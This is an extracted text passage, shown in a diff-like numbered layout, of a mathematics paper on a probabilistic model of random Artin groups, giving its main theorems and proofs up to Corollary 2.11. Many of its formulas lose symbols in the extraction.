 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ RANDOM ARTIN GROUPS
2
+ ANTOINE GOLDSBOROUGH AND NICOLAS VASKOU
3
+ Abstract. We introduce a new model of random Artin groups. The two variables we consider are the
4
+ rank of the Artin groups and the set of permitted coefficients of their defining graphs.
5
+ The heart of our model is to control the speed at which we make that set of permitted coefficients
6
+ grow relatively to the growth of the rank of the groups, as it turns out different speeds yield very different
7
+ results. We describe these speeds by means of (often polynomial) functions. In this model, we show
8
+ that for a large range of such functions, a random Artin group satisfies most conjectures about Artin
9
+ groups asymptotically almost surely.
10
+ Our work also serves as a study of how restrictive the commonly studied families of Artin groups
11
+ are, as we compute explicitly the probability that a random Artin group belongs to various families of
12
+ Artin groups, such as the classes of 2-dimensional Artin groups, FC-type Artin groups, large-type Artin
13
+ groups, and others.
14
+ 1. Introduction.
15
+ Artin groups are a family of groups that have drawn an increasing interest in the past few decades.
16
+ They are defined as follows. Let Γ be a defining graph, that is a simplicial graph with vertex set V (Γ)
17
+ and edge set E(Γ), such that every edge eab of Γ connecting two vertices a and b is given a coefficient
18
+ mab ∈ {2, 3, · · · }. Then Γ defines an Artin group:
19
+ AΓ := ⟨ V (Γ) |
20
+ aba · · ·
21
+ � �� �
22
+ mab terms
23
+ =
24
+ bab · · ·
25
+ � �� �
26
+ mab terms
27
+ , ∀eab ∈ E(Γ) ⟩.
28
+ The cardinality of V (Γ), that is the number of standard generators of AΓ, is called the rank of AΓ.
29
+ When a and b are not connected by an edge we set mab := ∞.
30
+ One of the main reasons why Artin groups have become of such great interest is because of the amount
31
+ of (often easily stated) conjectures and problems about them that are still to be solved. While some of
32
+ these conjectures are algebraic (torsion, centres), some others are more geometric (acylindrical hyper-
33
+ bolicity, CAT(0)-ness), algorithmic (word and conjugacy problems, biautomaticity), or even topological.
34
+ Although close to none of these conjectures or problems has been answered in the most general case,
35
+ there has been progress on each of them. A common theme towards proving these conjectures has been
36
+ to prove them for smaller families of Artin groups.
37
+ The goal of this paper is to consider Artin groups with a probabilistic approach. One might wonder
38
+ “What does a typical Artin group look like?”, and hence want to define a notion of randomness for Artin
39
+ groups. By computing the different “sizes” of the most commonly studied classes of Artin groups, we give
40
+ a way to quantify how restrictive these different classes really are. In light of that, our model provides
41
+ a novel and explicit way of quantifying the state of the common knowledge about the aforementioned
42
+ conjectures and problems about Artin groups.
43
+ Although Artin groups are defined using defining graphs, it is not known in general when two defining
44
+ graphs give rise to isomorphic Artin groups. This problem, known as the isomorphism problem, is
45
+ actually quite hard to solve even for restrictive classes of Artin groups. With our current knowledge, any
46
+ (reachable) theory of randomness for Artin groups must then be based on the randomness of defining
47
+ graphs, and not of the Artin groups themselves.
48
+ Random right-angled Coxeter (and Artin) groups have been studied by several authors in the literature
49
+ ([CF12], [BHS17]), using the Erd˝os–R´enyi model. While in [CF12] the authors fix the probability of
50
+ apparition of an edge as some constant 0 ≤ p ≤ 1, in [BHS17] this model is refined: p = p(N) depends on
51
+ 1
52
+ arXiv:2301.04211v1 [math.GR] 10 Jan 2023
53
+
54
+ 2
55
+ ANTOINE GOLDSBOROUGH AND NICOLAS VASKOU
56
+ the rank N of the group. That said, these models restrict to right-angled groups, where the associated
57
+ defining graphs are not labelled. In [Dei20], the author introduces a model of randomness for Coxeter
58
+ groups in general. There are similarities between this model and ours, although the former revolves more
59
+ about making the probabilities of apparition of specific coefficients vary. In particular, this model is not
60
+ very well suited to provide insights on the “sizes” of the most commonly studied classes of Coxeter and
61
+ Artin groups. On the contrary, this is a central goal of our model.
62
+ The two variables that come to mind when thinking about Artin groups are their rank, that is the
63
+ number of vertices of the defining graph, as well as the choice of the associated coefficients. A first step
64
+ in the theory is to consider what happens if we restrict ourselves to the family GN,M of all the defining
65
+ graphs with N vertices and with coefficients in {∞, 2, 3, · · · , M}, for some N ≥ 1 and M ≥ 2. As we
66
+ want any possible rank and any possible coefficient to eventually appear in a random Artin group, a
67
+ convenient way to think about randomness is to pick a defining graph at random in the family GN,M,
68
+ and then to make N and M grow to infinity.
69
+ As it turns out, randomness of defining graphs highly depends on the speed at which N and M grow.
70
+ A prime example of this is that the probability for a defining graph of GN,M to give an Artin group of
71
+ large-type (meaning that none of the coefficients is 2) tends to 1 when M grows much faster than N,
72
+ and tends to 0 when N grows much faster than M. To solve this problem, we decide to relate N and M
73
+ through a function f so that M := f(N). This way, we only have to look at the family GN,f(N) when N
74
+ goes to infinity.
75
+ If AF is a family of Artin groups coming from a family of defining graphs F, a way of measuring the
76
+ “size” of AF is to compute the limit
77
+ lim
78
+ N→∞
79
+ #(F ∩ GN,f(N))
80
+ #(GN,f(N))
81
+ .
82
+ Of course, this ratio depends on the choice we make for the function f. When the above limit is 1,
83
+ that is when the probability that a graph picked at random in GN,f(N) will give an Artin group that
84
+ belongs to the said family AF tends to 1, we say that an Artin group picked at random (relatively to f)
85
+ is asymptotically almost surely in AF.
86
+ That said, there are families AF of Artin groups for which the above limit tends to 1 no matter what
87
+ (sensible) choice we make for the function f. We say that such a family is uniformly large (resp.
88
+ uniformly small if that limit is always 0). Our first result concern such families of Artin groups:
89
+ Theorem 1.1. The family of irreducible Artin groups and the family of Artin groups with connected
90
+ defining graphs are uniformly large. On the other hand, the family of Artin groups of type FC is uniformly
91
+ small. In particular, the same applies to the families of RAAGs and triangle-free Artin groups.
92
+ As mentioned earlier, there are numerous families of Artin groups whose “size” depends on the choice
93
+ of function f. When f is large enough, which means that the choice of possible coefficients for the defining
94
+ graphs grows fast enough compared to the rank of the Artin group, we obtain much stronger results.
95
+ This is made explicit in the next two theorems.
96
+ Before stating these results, we recall a very natural partial ordering on (non-decreasing divergent)
97
+ functions, which is given by f ≻ g whenever limN→∞ f(N)/g(N) = ∞.
98
+ Theorem 1.2. Let AF be any family of Artin groups defined by forbidding a finite number k of coefficients
99
+ from their defining graphs, and consider a function f : N → N. Let Γ be a graph picked at random in
100
+ GN,f(N). Then:
101
+ (1) If f(N) ≻ N 2, then AΓ asymptotically almost surely belongs to F.
102
+ (2) If f(N) ≺ N 2, then AΓ asymptotically almost surely does not belong to F.
103
+ (3) If f(N) = N 2, then the probability that AΓ belongs to F tends to e−k/2 when N → ∞.
104
+ Note that the previous theorem applies to the families of large-type, extra-large-type, or large-type
105
+ and free-of-infinity Artin groups. There are strong results in the literature about these families of Artin
106
+
107
+ RANDOM ARTIN GROUPS
108
+ 3
109
+ groups, as most of the famous conjectures and problems about Artin groups have been solved for at least
110
+ one of them (see Section 2).
111
+ While these different families of Artin groups have the same threshold at f(N) = N 2 no matter how
112
+ many coefficients we forbid, the class of 2-dimensional Artin groups turns out to be substantially bigger.
113
+ Studying this class, we obtain the following result:
114
+ Theorem 1.3. Consider a non-decreasing divergent function f : N → N. Let Γ be a graph picked at
115
+ random in GN,f(N). Then:
116
+ (1) If f(N) ≻ N 3/2, then AΓ asymptotically almost surely is 2-dimensional.
117
+ (2) If f(N) ≺ N 3/2, then AΓ asymptotically almost surely is not 2-dimensional.
118
+ A consequence of the two previous theorems is that we are able, when f grows fast enough, to show
119
+ that an Artin group picked at random asymptotically almost surely satisfies most of the main conjectures
120
+ about Artin groups:
121
+ Theorem 1.4. Let f : N → N be such that f(N) ≻ N 3/2, and let Γ be a graph picked at random in
122
+ GN,f(N). Then asymptotically almost surely, the following properties hold:
123
+ (1) AΓ is torsion-free;
124
+ (2) AΓ has trivial centre;
125
+ (3) AΓ has solvable word and conjugacy problem;
126
+ (4) AΓ satisfies the K(π, 1)-conjecture;
127
+ (5) The set of parabolic subgroups of AΓ is closed under (arbitrary) intersections;
128
+ (6) AΓ is acylindrically hyperbolic;
129
+ (7) AΓ satisfies the Tits Alternative.
130
+ Moreover, if f(N) ≻ N 2 then asymptotically almost surely the following properties also hold:
131
+ (8) AΓ is CAT(0);
132
+ (9) AΓ is hierarchically hyperbolic;
133
+ (10) AΓ is systolic and thus biautomatic;
134
+ (11) Aut(AΓ) ∼= AΓ ⋊ Out(AΓ), where Out(AΓ) ∼= Aut(Γ) × (Z/2Z) is finite.
135
+ At last, we also prove interesting results for families of Artin groups in which the number M of
136
+ permitted coefficients grows “slowly enough” compared to the rank N. We focus on the class of Artin
137
+ groups AΓ whose associated graphs Γ are not cones, and we prove that for most (non-decreasing divergent)
138
+ functions, the probability that a random Artin group is acylindrically hyperbolic and has trivial centre
139
+ tends to 1.
140
+ Theorem 1.5. Let α ∈ (0, 1) and let f : N → N be a non-decreasing divergent function satisfying
141
+ f(N) ≺ N 1−α. Let now Γ be a graph picked at random in GN,f(N). Then the associated Artin group AΓ
142
+ is acylindrically hyperbolic and has trivial centre asymptotically almost surely.
143
+ Even though the order on (non-decreasing divergent) function is not total, the results of the above
144
+ theorems for polynomial functions can be encapsulated in Figure 1.
145
+ The previous results shows that we are very close to being able to state that “almost all Artin groups
146
+ are acylindrically hyperbolic and have trivial centres”. That said, there is a small range of functions for
147
+ which no probabilistic result regarding acylindrical hyperbolicity or centres being trivial can be stated.
148
+ In light of that, we raise the following problem:
149
+ Question 1.6. Construct a family AF of acylindrically hyperbolic Artin groups or of Artin groups with
150
+ trivial centres for which the following holds:
151
+ There exists an α ∈ (0, 1) such that for all functions f : N → N satisfying N 1−α ≼ f(N) ≼ N 3/2, a
152
+ graph Γ picked at random in GN,f(N) is such that AΓ asymptotically almost surely belongs to AF.
153
+
154
+ 4
155
+ ANTOINE GOLDSBOROUGH AND NICOLAS VASKOU
156
+ Figure 1. The axis represents various (polynomial) functions f. Above the main axis
157
+ are described the classes of Artin groups that we obtain asymptotically almost surely
158
+ relatively to f, while under this axis we list the properties that we know these groups
159
+ will satisfy asymptotically almost surely.
160
+ Acknowledgements. The authors would like to thank Alessandro Sisto for helpful conversations and
161
+ for pointing out the strategy of the second moment method and Alexandre Martin for useful comments.
162
+ We would also like to thank the Institut Henri Poincar´e (UAR 839 CNRS-Sorbonne Universit´e), and
163
+ LabEx CARMIN (ANR-10-LABX-59-01) for providing a warm environment for this project to begin.
164
+ The work of the first author was supported by the EPSRC-UKRI studentship EP/V520044/1.
165
+ 2. Preliminaries and first results.
166
+ In this section we bring more details about some of the notions discussed in the introduction. This
167
+ includes discussions about most of the commonly studied classes of Artin groups, as well as discussions
168
+ regarding open conjectures related to Artin groups.
169
+ Throughout this paper, we will often call a triangle in a graph Γ any subgraph of Γ that is generated
170
+ by 3 vertices. This notation will be convenient, although one must note that with this definition, triangles
171
+ may have strictly fewer than 3 edges, as subgraphs of Γ.
172
+ Most of the main conjectures about Artin groups are still open in general. That said, many of them
173
+ have been proved for smaller families of Artin groups. Two important of these families are the families
174
+ of 2-dimensional Artin groups and the family of Artin groups of type FC. These two families have been
175
+ extensively studied following the work of Charney and Davis (see [CD95a]).
176
+ The other well-studied
177
+ families are usually sub-families of these.
178
+ Before coming to these definitions, we first recall what a parabolic subgroup of an Artin group is. Let
179
+ AΓ be any Artin group, and let Γ′ be a full subgraph of Γ. A standard result about Artin groups states
180
+ that the subgroup of AΓ generated by the vertices of Γ′ is also an Artin group, that is isomorphic to AΓ′
181
+ ([vdL83]). Such a subgroup is called a standard parabolic subgroup of AΓ. The conjugates of these
182
+ subgroups are called the parabolic subgroups of AΓ.
183
+ Definition 2.1. (0) An Artin group AΓ is said to be spherical if the associated Coxeter group WΓ is
184
+ finite.
185
+ (1) An Artin group AΓ is said to be 2-dimensional if for every triplet of distinct standard generators
186
+ a, b, c ∈ V (Γ), the subgraph Γ′ spanned by a, b and c corresponds to an Artin group AΓ′ that is not
187
+
188
+ Large, XL, XXL,Free-o
189
+ I is not a cone
190
+ 2 - dimensional Artin groups
191
+ N 1-α N
192
+ N 3/2
193
+ N2
194
+ f(N)
195
+ : Acylindrically hyperbolic
196
+ : Trivial centre
197
+ : Acylindrically hyperbolic
198
+ . Solvable conjugacy problem
199
+ .CAT(O)
200
+ . Trivial centre
201
+ K(π, 1) - conjecture holds
202
+ . Hierarchically hyperbolic
203
+ . Parabolic subgroups stable
204
+ . Systolic
205
+ under conjugation
206
+ • Finite Out(Ar)
207
+ Tits Alternative holdsRANDOM ARTIN GROUPS
208
+ 5
209
+ spherical. By a result of ([CD95a]), this is equivalent to requiring that
210
+ 1
211
+ mab
212
+ +
213
+ 1
214
+ mac
215
+ +
216
+ 1
217
+ mbc
218
+ ≤ 1.
219
+ The family of 2-dimensional Artin groups contains the well-studied families of large-type Artin groups
220
+ (every coefficient is at least 3), extra-large-type Artin groups (every coefficient is at least 4), or XXL
221
+ Artin groups (every coefficient is at least 5).
222
+ (2) An Artin group AΓ is said to be of type FC if every complete subgraph Γ′ ⊆ Γ generates an Artin
223
+ group AΓ′ that is spherical. The family of Artin groups of type FC contains the family of right-angled
224
+ Artin groups, also called RAAGs (the only permitted coefficients are 2 and ∞), the family of spherical
225
+ Artin groups, and the family of triangle-free Artin groups (the Artin groups whose associated graphs
226
+ don’t contain any 3-cycles). Being triangle-free is actually equivalent to being both of type FC and
227
+ 2-dimensional.
228
+ We now move towards the main conjectures related to Artin groups. For each conjecture, we will briefly
229
+ describe the state of the common research towards proving it, by mentioning the one or two result(s)
230
+ that will turn out to be the more “probabilistically relevant” in our model. In other words, the results
231
+ that cover the largest classes.
232
+ Conjecture 2.2. Let AΓ be any Artin group. Then:
233
+ (1) AΓ is torsion-free.
234
+ �→ This was proved for 2-dimensional Artin groups ([CD95b]).
235
+ (2) If AΓ is irreducible and non-spherical, then AΓ has trivial centre.
236
+ �→ This was proved for 2-dimensional Artin groups ([Vas22a]), and for Artin groups whose
237
+ graph is not the cone of a single vertex ([CMW19]).
238
+ (3) AΓ has solvable word and conjugacy problems.
239
+ �→ This was proved for 2-dimensional Artin groups ([HO19])
240
+ (4) AΓ satisfies the K(π, 1)-conjecture.
241
+ �→ This was proved for 2-dimensional Artin groups ([CD95b]).
242
+ (5) Intersections of parabolic subgroups of AΓ give parabolic subgroups of AΓ.
243
+ �→ This was proved for large-type Artin groups ([CMV22]) and more generally for (2, 2)-free
244
+ 2-dimensional Artin groups ([Blu21]).
245
+ (6) AΓ is CAT(0).
246
+ �→ This was proved for XXL Artin groups ([Hae22]).
247
+ (7) If AΓ is irreducible and non-spherical, then AΓ is acylindrically hyperbolic.
248
+ �→ This was proved for 2-dimensional Artin groups ( [Vas22a]), and for Artin groups whose
249
+ graph is not the cone of a single vertex ([KO22])
250
+ (8) AΓ is hierarchically hyperbolic.
251
+ �→ This was proved for extra-large Artin groups.[HMS21]
252
+ (9) AΓ is systolic and biautomatic.
253
+ �→ This was proved for large-type Artin groups. [HO20]
254
+ (10) AΓ satisfies the Tits Alternative.
255
+ �→ This was proved for 2-dimensional Artin groups ([Mar22]).
256
+ In addition to these conjectures, the following question has been raised:
257
+ (11) When is Out(AΓ) finite?
258
+ �→ This was proved to be the case for large-type free-of-infinity Artin groups ([Vas22b]).
259
+ Definition 2.3. Let F be a family of defining graphs and let AF be the corresponding class of Artin
260
+ groups. Let f : N → N be a non-decreasing divergent function. We define the probability that an Artin
261
+ group AΓ picked at random (relatively to f) belongs to AF as the following limit, when it exists:
262
+ Pf
263
+
264
+ AΓ ∈ AF
265
+ � := lim
266
+ N→∞ P
267
+
268
+ Γ ∈ F | Γ ∈ GN,f(N)�
269
+ = lim
270
+ N→∞
271
+ #(F ∩ GN,f(N))
272
+ #(GN,f(N))
273
+ .
274
+
275
+ 6
276
+ ANTOINE GOLDSBOROUGH AND NICOLAS VASKOU
277
+ Furthermore, we say that an Artin group AΓ picked at random (relatively to f) is asymptotically
278
+ almost surely in AF if Pf
279
+
280
+ AΓ ∈ AF
281
+
282
+ = 1. Similarly, we say that AΓ is asymptotically almost surely
283
+ not in AF if Pf
284
+
285
+ AΓ ∈ AF
286
+
287
+ = 0.
288
+ Definition 2.4. Let AF be a family of Artin groups. Then we say that AF is uniformly large if for
289
+ every non-decreasing divergent function f : N → N, an Artin group AΓ picked at random (relatively to
290
+ f) is asymptotically almost surely in AF. We say that F is uniformly small if AΓ is asymptotically
291
+ almost surely not in AF.
292
+ We now move towards our first results. The first thing we will proved is that the family of irreducible
293
+ Artin groups and the family of Artin groups with connected defining graphs are uniformly large. This is
294
+ important as many results regarding Artin groups assume that the corresponding groups are irreducible
295
+ and/or have a connected defining graph. Our work show that these two hypotheses are very much not
296
+ restrictive.
297
+ Definition 2.5. Let Γ1 and Γ2 be two defining graphs. The graph Γ1 ∗k Γ2 is the graph obtained by
298
+ attaching every vertex of Γ1 to every vertex of Γ2 by an edge with label k (with k ∈ {∞, 2, 3, · · · }).
299
+ Let now Γ be any defining graph. Then Γ is called a k-join relatively to Γ1 and Γ2 is there are two
300
+ subgraphs Γ1, Γ2 ⊆ Γ such that V (Γ1) ⊔ V (Γ2) = V (Γ) and such that Γ = Γ1 ∗k Γ2.
301
+ We will denote by AJk the class of Artin groups whose defining graphs decompose as k-joins.
302
+ Remark 2.6. (1) If Γ ∈ J2 then AΓ decomposes as a direct product AΓ1 × AΓ2 in an obvious way. In
303
+ that case, Γ is called reducible. The class J C
304
+ 2
305
+ of irreducible defining graphs will be denoted Irr.
306
+ (2) If Γ ∈ J∞ then it is disconnected. The class J C
307
+ ∞ of connected defining graphs will be denoted Con.
308
+ Lemma 2.7. The family AJk is uniformly small. In particular, the classes AIrr and ACon of Artin
309
+ groups are both uniformly large.
310
+ Proof. We will count the number of decompositions of the graph Γ as Γ = Γ1 ∗k Γ2.
311
+ Without loss
312
+ of generality, we will let Γ1 denote the subgraph with the lower rank, so that |V (Γ1)| ≤ ⌊N/2⌋. Let
313
+ f : N → N be a non-decreasing divergent function and consider the family Jk. For a given N ≥ 1, we
314
+ have:
315
+ P
316
+
317
+ Γ ∈ Jk | Γ ∈ GN,f(N)�
318
+ = P
319
+
320
+ ∃ Γ1, Γ2
321
+ with
322
+ |V (Γ1)| ≤ N/2
323
+ such that
324
+ Γ = Γ1 ∗k Γ2 | Γ ∈ GN,f(N)�
325
+
326
+ ⌊N/2⌋
327
+
328
+ j=1
329
+ P
330
+
331
+ ∃ Γ1, Γ2
332
+ with
333
+ |V (Γ1)| = j
334
+ such that
335
+ Γ = Γ1 ∗k Γ2 | Γ ∈ GN,f(N)�
336
+ =
337
+ ⌊N/2⌋
338
+
339
+ j=1
340
+ �N
341
+ j
342
+ � �
343
+ 1
344
+ f(N)
345
+ �j(N−j)
346
+
347
+ ⌊N/2⌋
348
+
349
+ j=1
350
+
351
+ Ne
352
+ jf(N)N/2
353
+ �j
354
+
355
+ Ne
356
+ f(N)N/2 ·
357
+
358
+
359
+
360
+
361
+ 1 −
362
+
363
+ Ne
364
+ f(N)N/2
365
+ �N/2+1
366
+ 1 −
367
+ Ne
368
+ f(N)N/2
369
+
370
+
371
+
372
+
373
+ where we used the bound
374
+ �N
375
+ j
376
+
377
+
378
+
379
+ Ne
380
+ j
381
+ �j
382
+ . Now limN→∞
383
+ Ne
384
+ f(N)N/2 = 0 for any non-decreasing divergent
385
+ function f, so we obtain
386
+ Pf
387
+
388
+ AΓ ∈ AJk
389
+
390
+ = lim
391
+ N→∞ P
392
+
393
+ Γ ∈ Jk | Γ ∈ GN,f(N)�
394
+ = 0 ·
395
+ �1 − 0
396
+ 1 − 0
397
+
398
+ = 0.
399
+ This proves the main statement of the lemma. The second statement then directly follows from Remark
400
+ 2.6.
401
+
402
+
403
+ RANDOM ARTIN GROUPS
404
+ 7
405
+ Our next result concerns the class of Artin groups of type FC.
406
+ Lemma 2.8. Let AFC be the family of Artin groups of type FC. Then AFC is uniformly small.
407
+ In
408
+ particular, the family of triangle-free Artin groups, the family of spherical Artin groups and the family of
409
+ RAAGs are also uniformly small.
410
+ Proof. Let f be any non-decreasing divergent function, and let Γ ∈ GN,f(N). We want to compute the
411
+ probability that Γ belongs to FC ∩ GN,f(N). Let a, b anc c be three vertices of Γ. The probability that
412
+ any of the three corresponding coefficients mab, mac and mbc is not 2 nor ∞ is precisely f(N)−2
413
+ f(N) , and
414
+ hence the probability that the three coefficients are not 2 nor ∞ is
415
+
416
+ f(N)−2
417
+ f(N)
418
+ �3
419
+ . Note that when this
420
+ happens, the subgraph Γ′ ⊆ Γ spanned by a, b and c is complete but generates an Artin group AΓ′ which
421
+ is non-spherical (the sum of the inverses of the three corresponding coefficients is ≤ 1). In particular, Γ
422
+ is not of type FC. We obtain
423
+ Pf
424
+
425
+ AΓ /∈ AFC
426
+
427
+ = lim
428
+ N→∞
429
+ #(GN,f(N)\FC)
430
+ #(GN,f(N))
431
+ ≥ lim
432
+ N→∞
433
+ �f(N) − 2
434
+ f(N)
435
+ �3
436
+ = lim
437
+ N→∞
438
+
439
+ 1 −
440
+ 2
441
+ f(N)
442
+ �3
443
+ = 1.
444
+
445
+ As mentioned in the introduction, there are interesting classes of Artin groups for which the probability
446
+ that a graph taken at random will belong to the class highly depends on the choice of function f. Some
447
+ examples are given through the following theorem.
448
+ Theorem 2.9. Let AF be any family of Artin groups defined by forbidding from their graphs a finite
449
+ number k of coefficients, and consider a function f : N → N. Let AΓ be an Artin group picked at random
450
+ (relatively to f). Then:
451
+ (1) If f(N) ≻ N 2, then AΓ asymptotically almost surely belongs to AF.
452
+ (2) If f(N) ≺ N 2, then AΓ asymptotically almost surely does not belong to AF.
453
+ (3) If f(N) = N 2 then asymptotically we have Pf
454
+
455
+ AΓ ∈ AF
456
+
457
+ = e−k/2.
458
+ Proof. A graph with N vertices has N(N−1)
459
+ 2
460
+ pairs of vertices, each of which is given one of f(N) possible
461
+ coefficients. Hence, direct computations on the possible number of graphs give
462
+ #GN,f(N) = (f(N))
463
+ N(N−1)
464
+ 2
465
+ .
466
+ Similarly, we have
467
+ #(F ∩ GN,f(N)) = (f(N) − k)
468
+ N(N−1)
469
+ 2
470
+ .
471
+ And thus we obtain
472
+ Pf
473
+
474
+ AΓ ∈ AF
475
+
476
+ = lim
477
+ N→∞
478
+ #(F ∩ GN,f(N))
479
+ #(GN,f(N))
480
+ = lim
481
+ N→∞
482
+ �f(N) − k
483
+ f(N)
484
+ � N(N−1)
485
+ 2
486
+ = lim
487
+ N→∞
488
+ �f(N) − k
489
+ f(N)
490
+ �N2( N−1
491
+ 2N )
492
+ .
493
+ If f(N) ≻ N 2, there is a function h with limN→∞ h(N) = ∞ such that f(N) = h(N)N 2 and hence
494
+ Pf
495
+
496
+ AΓ ∈ AF
497
+
498
+ = lim
499
+ N→∞
500
+ �f(N) − k
501
+ f(N)
502
+ �f(N)�
503
+ N−1
504
+ 2Nh(N)
505
+
506
+ = lim
507
+ N→∞ e−k�
508
+ N−1
509
+ 2Nh(N)
510
+
511
+ = 1.
512
+ If f(N) ≺ N 2, there exists a function h with limN→∞ h(N) = ∞ such that f(N)h(N) = N 2 and
513
+ Pf
514
+
515
+ AΓ ∈ AF
516
+
517
+ = lim
518
+ N→∞
519
+ �f(N) − k
520
+ f(N)
521
+ �f(N)� (N−1)h(N)
522
+ 2N
523
+
524
+ = lim
525
+ N→∞ e−k� (N−1)h(N)
526
+ 2N
527
+
528
+ = 0.
529
+ Finally if f(N) = N 2 then
530
+ Pf
531
+
532
+ AΓ ∈ AF
533
+
534
+ = lim
535
+ N→∞
536
+
537
+ N 2 − k
538
+ N 2
539
+ �N2( N−1
540
+ 2N )
541
+ = lim
542
+ N→∞ e−k( N−1
543
+ 2N ) = e−k/2.
544
+
545
+
546
+ 8
547
+ ANTOINE GOLDSBOROUGH AND NICOLAS VASKOU
548
+ The previous theorem has many consequences, as it can be applied to the families of large-type, extra-
549
+ large-type, XXL or free-of-infinity Artin groups, for which much is known. Before stating an explicit
550
+ result in Corollary 2.11, we prove the following small lemma:
551
+ Lemma 2.10. Let AF and AH be two families of Artin groups, let f : N → N be a non-decreasing
552
+ divergent function, and suppose that Pf
553
+
554
+ AΓ ∈ AH
555
+
556
+ = 1. Then
557
+ Pf
558
+
559
+ AΓ ∈ AF
560
+
561
+ = Pf
562
+
563
+ AΓ ∈ AF ∩ AH
564
+
565
+ .
566
+ Proof. This is straightforward:
567
+ Pf
568
+
569
+ AΓ ∈ AF
570
+
571
+ = Pf
572
+
573
+ AΓ ∈ AF ∩ AH
574
+
575
+ + Pf
576
+
577
+ AΓ ∈ AF ∪ AH
578
+
579
+
580
+ ��
581
+
582
+ =1
583
+ − Pf
584
+
585
+ AΓ ∈ AH
586
+
587
+
588
+ ��
589
+
590
+ =1
591
+ = Pf
592
+
593
+ AΓ ∈ AF ∩ AH
594
+
595
+ .
596
+
597
+ Corollary 2.11. Let f : N → N be a function satisfying f(N) ≻ N 2. Then an Artin group AΓ picked
598
+ at random (relatively to f) satisfies any of the following property asymptotically almost surely:
599
+ (1) AΓ is torsion-free;
600
+ (2) AΓ has trivial centre;
601
+ (3) AΓ has solvable word and conjugacy problems;
602
+ (4) AΓ satisfies the K(π, 1)-conjecture;
603
+ (5) The set of parabolic subgroups of AΓ is closed under arbitrary intersections;
604
+ (6) AΓ is CAT(0);
605
+ (7) AΓ is acylindrically hyperbolic;
606
+ (8) AΓ is hierarchically hyperbolic;
607
+ (9) AΓ is systolic and biautomatic;
608
+ (10) AΓ satisfies the Tits Alternative;
609
